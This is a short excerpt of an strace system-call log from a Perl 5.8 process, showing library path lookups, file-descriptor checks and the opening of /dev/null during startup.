5215  07:08:09.878534 stat64("/usr/local/lib/perl/5.8.4", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878559 stat64("/usr/local/share/perl/5.8.4", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878570 stat64("/usr/local/lib/perl/5.8.3", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878581 stat64("/usr/local/share/perl/5.8.3", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878593 stat64("/usr/local/lib/perl/5.8.2", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878604 stat64("/usr/local/share/perl/5.8.2", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878616 stat64("/usr/local/lib/perl/5.8.1", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878627 stat64("/usr/local/share/perl/5.8.1", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878638 stat64("/usr/local/lib/perl/5.8.0", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878649 stat64("/usr/local/share/perl/5.8.0", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878671 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfccbc68) = -1 ENOTTY (Inappropriate ioctl for device)

5215  07:08:09.878684 _llseek(0, 0, [0], SEEK_CUR) = 0

5215  07:08:09.878695 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfccbc68) = -1 EBADF (Bad file descriptor)

5215  07:08:09.878706 _llseek(1, 0, 0xbfccbcb0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

5215  07:08:09.878716 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfccbc68) = -1 EINVAL (Invalid argument)

5215  07:08:09.878727 _llseek(2, 0, 0xbfccbcb0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

5215  07:08:09.878736 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

5215  07:08:09.878749 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfccbd28) = -1 ENOTTY (Inappropriate ioctl for device)

5215  07:08:09.878759 _llseek(1, 0, [0], SEEK_CUR) = 0

5215  07:08:09.878769 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

5215  07:08:09.878781 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

5215  07:08:09.878799 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

5215  07:08:09.878851 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

5215  07:08:09.878893 getppid()         = 5213

5215  07:08:09.879038 stat64("/etc/perl/IO.pmc", 0xbfccba1c) = -1 ENOENT (No such file or directory)

5215  07:08:09.879052 stat64("/etc/perl/IO.pm", 0xbfccb92c) = -1 ENOENT (No such file or directory)

5215  07:08:09.879065 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfccba1c) = -1 ENOENT (No such file or directory)

